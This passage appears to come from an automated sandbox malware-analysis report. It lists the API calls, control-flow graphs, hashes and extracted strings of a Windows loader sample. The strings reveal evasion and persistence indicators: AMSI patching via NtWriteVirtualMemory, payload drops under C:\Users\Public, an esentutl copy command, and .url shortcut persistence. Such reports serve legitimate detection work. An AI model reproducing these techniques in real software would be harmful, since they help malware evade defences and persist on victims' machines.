                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC89D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
                                                                                                                                                                                                                                                                                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F2B7E0,02F2B824,OpenSession,02E37380,02DDB7B8,UacScan,02E37380), ref: 02DD86E9
                                                                                                                                                                                                                                                                                                                                  • ResumeThread.KERNEL32(00000000,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8), ref: 02DD8D33
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,00000000,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380), ref: 02DD8EB2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: LoadLibraryW.KERNEL32(bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,UacScan), ref: 02DC8960
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DC897A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize), ref: 02DC89B6
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02E37380,02DDB7B8,UacInitialize,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,UacScan,02E37380), ref: 02DD92A4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB7E5C: GetFileAttributesA.KERNEL32(00000000,?,02DD041F,ScanString,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,UacInitialize), ref: 02DB7E67
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DCDD5E), ref: 02DCDCCB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DCDD05
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DCDD32
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DCDD3B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DC83C2), ref: 02DC83A4
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(00000000,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,Initialize,02E37380,02DDB7B8,00000000,00000000,00000000,ScanString,02E37380,02DDB7B8), ref: 02DDB2FA
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                                                                                                                                                                                                                  • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2769005614-3738268246
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d027486b05b0c993f1cd1e1631810aff5f286e0bef14b66e5cd0c2039d391567
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dcbd651ce73eedeb0af3786373aa06b4dd255c1f488ef34e0fbc8001ccf89278
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d027486b05b0c993f1cd1e1631810aff5f286e0bef14b66e5cd0c2039d391567
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09431F34A4016DDBDB12EB65DCA09CE73BAEF85304F5040E6E00AEB715DB30AE958F65
                                                                                                                                                                                                                                                                                                                                  Function 02DD3E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC89D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DCDD5E), ref: 02DCDCCB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DCDD05
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DCDD32
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DCDD3B
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,02DDBB30,00000000,00000000,02DDBB24,00000000,00000000), ref: 02DD40CB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC88B8: LoadLibraryW.KERNEL32(amsi), ref: 02DC88C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DC8920
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,000003E8,ScanBuffer,02E37380,02DDB7B8,UacScan,02E37380), ref: 02DD4277
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: LoadLibraryW.KERNEL32(bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,UacScan), ref: 02DC8960
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DC897A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize), ref: 02DC89B6
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00004E20,UacScan,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,UacInitialize,02E37380,02DDB7B8), ref: 02DD50EE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC04: RtlI.N(?,?,00000000,02DCDC7E), ref: 02DCDC2C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DCDC7E), ref: 02DCDC42
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DCDC7E), ref: 02DCDC61
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB7E5C: GetFileAttributesA.KERNEL32(00000000,?,02DD041F,ScanString,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,UacInitialize), ref: 02DB7E67
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC85BC: WinExec.KERNEL32(?,?), ref: 02DC8624
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                                                                                                                                                                                                                                  • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2171786310-3926298568
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 532c0f07826b0eb48f8b41214c59959d7a5f0e5493ed66d546519adb2b1513f9
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b53de9c9764abb14a4aac054a3d9fdc58f352903b04d23a7a33423096ed7e104
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 532c0f07826b0eb48f8b41214c59959d7a5f0e5493ed66d546519adb2b1513f9
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24431C34A4015DDBEB11EB65DCA0EDE73B6FF89304F6040A6940AAB715DB30AE85CF61
                                                                                                                                                                                                                                                                                                                                  Function 02DCE678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 10970 2dce678-2dce67c 10971 2dce681-2dce686 10970->10971 10971->10971 10972 2dce688-2dcec81 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4740 * 2 call 2db4860 call 2db4778 call 2db30d4 call 2db46d4 * 2 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4740 call 2db7f2c call 2db49a0 call 2db4d74 call 2db4df0 call 2db4740 call 2db49a0 call 2db4d74 call 2db4df0 call 2dc8788 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c 10971->10972 11175 2dcec87-2dceedd call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 WaitForSingleObject CloseHandle * 2 call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c * 3 10972->11175 11176 2dceee2-2dcef2f call 2db4500 call 2db4c60 call 2db4500 call 2db4c60 call 2db4500 10972->11176 11175->11176
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC89D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DC8814
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: LoadLibraryW.KERNEL32(bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,UacScan), ref: 02DC8960
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DC897A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize), ref: 02DC89B6
                                                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02E37380,02DCEF4C,OpenSession,02E37380,02DCEF4C,UacScan,02E37380,02DCEF4C,ScanBuffer,02E37380,02DCEF4C,OpenSession,02E37380), ref: 02DCED6E
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02E37380,02DCEF4C,OpenSession,02E37380,02DCEF4C,UacScan,02E37380,02DCEF4C,ScanBuffer,02E37380,02DCEF4C,OpenSession), ref: 02DCED76
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000008A8,00000000,00000000,000000FF,ScanString,02E37380,02DCEF4C,OpenSession,02E37380,02DCEF4C,UacScan,02E37380,02DCEF4C,ScanBuffer,02E37380,02DCEF4C), ref: 02DCED7F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                                                                                                                                                                                                                                  • String ID: )"C:\Users\Public\Libraries\aymtmquJ.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3475578485-3334284989
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c93ea1fb1c4764be65e09b38b50a68c1cad022b417e9da30c28cab2b261aee9b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 57f24139f8adf005da7a097b3fbb5ade8f3f97a76e5286be469a3152d1bca5c4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c93ea1fb1c4764be65e09b38b50a68c1cad022b417e9da30c28cab2b261aee9b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F22F075A00159DBEB12EB64D8B1BCE73BAEF85300F6041A9E006AB355DB30AD45CF65
                                                                                                                                                                                                                                                                                                                                  Function 02DB1724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 13139 2db1724-2db1736 13140 2db1968-2db196d 13139->13140 13141 2db173c-2db174c 13139->13141 13144 2db1973-2db1984 13140->13144 13145 2db1a80-2db1a83 13140->13145 13142 2db174e-2db175b 13141->13142 13143 2db17a4-2db17ad 13141->13143 13148 2db175d-2db176a 13142->13148 13149 2db1774-2db1780 13142->13149 13143->13142 13152 2db17af-2db17bb 13143->13152 13150 2db1938-2db1945 13144->13150 13151 2db1986-2db19a2 13144->13151 13146 2db1a89-2db1a8b 13145->13146 13147 2db1684-2db16ad VirtualAlloc 13145->13147 13153 2db16df-2db16e5 13147->13153 13154 2db16af-2db16dc call 2db1644 13147->13154 13155 2db176c-2db1770 13148->13155 13156 2db1794-2db17a1 13148->13156 13158 2db1782-2db1790 13149->13158 13159 2db17f0-2db17f9 13149->13159 13150->13151 13157 2db1947-2db195b Sleep 13150->13157 13160 2db19b0-2db19bf 13151->13160 13161 2db19a4-2db19ac 13151->13161 13152->13142 13162 2db17bd-2db17c9 13152->13162 13154->13153 13157->13151 13169 2db195d-2db1964 Sleep 13157->13169 13166 2db17fb-2db1808 13159->13166 13167 2db182c-2db1836 13159->13167 13163 2db19d8-2db19e0 13160->13163 13164 2db19c1-2db19d5 13160->13164 13170 2db1a0c-2db1a22 13161->13170 13162->13142 13165 2db17cb-2db17de Sleep 13162->13165 13172 2db19fc-2db19fe call 2db15cc 13163->13172 13173 2db19e2-2db19fa 13163->13173 13164->13170 13165->13142 13171 2db17e4-2db17eb Sleep 13165->13171 13166->13167 13174 2db180a-2db181e Sleep 13166->13174 13175 2db18a8-2db18b4 13167->13175 13176 2db1838-2db1863 13167->13176 13169->13150 13178 2db1a3b-2db1a47 13170->13178 13179 2db1a24-2db1a32 13170->13179 13171->13143 13180 2db1a03-2db1a0b 13172->13180 13173->13180 13174->13167 13182 2db1820-2db1827 Sleep 13174->13182 13188 2db18dc-2db18eb call 2db15cc 13175->13188 13189 2db18b6-2db18c8 13175->13189 13183 2db187c-2db188a 13176->13183 13184 2db1865-2db1873 13176->13184 13186 2db1a49-2db1a5c 13178->13186 13187 2db1a68 13178->13187 13179->13178 13185 2db1a34 13179->13185 13182->13166 13194 2db18f8 13183->13194 13195 2db188c-2db18a6 call 2db1500 13183->13195 13184->13183 13193 2db1875 13184->13193 13185->13178 13196 2db1a5e-2db1a63 call 2db1500 13186->13196 13197 2db1a6d-2db1a7f 13186->13197 13187->13197 13198 2db18fd-2db1936 13188->13198 13202 2db18ed-2db18f7 13188->13202 13190 2db18ca 13189->13190 13191 2db18cc-2db18da 13189->13191 13190->13191 13191->13198 13193->13183 13194->13198 13195->13198 13196->13197
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,02DB2000), ref: 02DB17D0
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,02DB2000), ref: 02DB17E6
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 37d28567766f72e6e595e940dca00c4f52cb74a7136eacd386100a14cc6e741f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6fe8d9472dc960a71b36c335868c433b86723af1d645682a18b23d4650ef175d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37d28567766f72e6e595e940dca00c4f52cb74a7136eacd386100a14cc6e741f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBB13576A40291CBCB16CF29D4B8395BBE1FF86312F59866ED44A8B3C5C770D891CB90
                                                                                                                                                                                                                                                                                                                                  Function 02DC88B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(amsi), ref: 02DC88C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7DEC
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DC8920
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
